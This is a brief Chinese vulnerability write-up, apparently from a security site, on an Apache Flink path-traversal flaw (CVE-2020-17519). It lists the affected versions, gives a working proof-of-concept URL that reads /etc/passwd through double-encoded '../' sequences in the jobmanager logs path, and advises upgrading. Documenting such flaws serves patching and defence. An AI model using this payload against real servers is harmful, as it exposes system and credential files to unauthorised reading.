Apache Flink 任意文件读取(CVE-2020-17519 )

### 简介 ###

Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。

### 影响版本 ###

1.11.0

1.11.1

1.11.2

### 漏洞利用 ###

![](/static/baige/06-中间件框架漏洞/Apache/图片/af947f7215c0f6b269a8c2fdda19cd11.png)

POC:

http://127.0.0.1/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

![](/static/baige/06-中间件框架漏洞/Apache/图片/7e383cf57a9e36bdf8f9c87a68a3dab4.png)

### 修复建议 ###

所有用户升级最新版

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容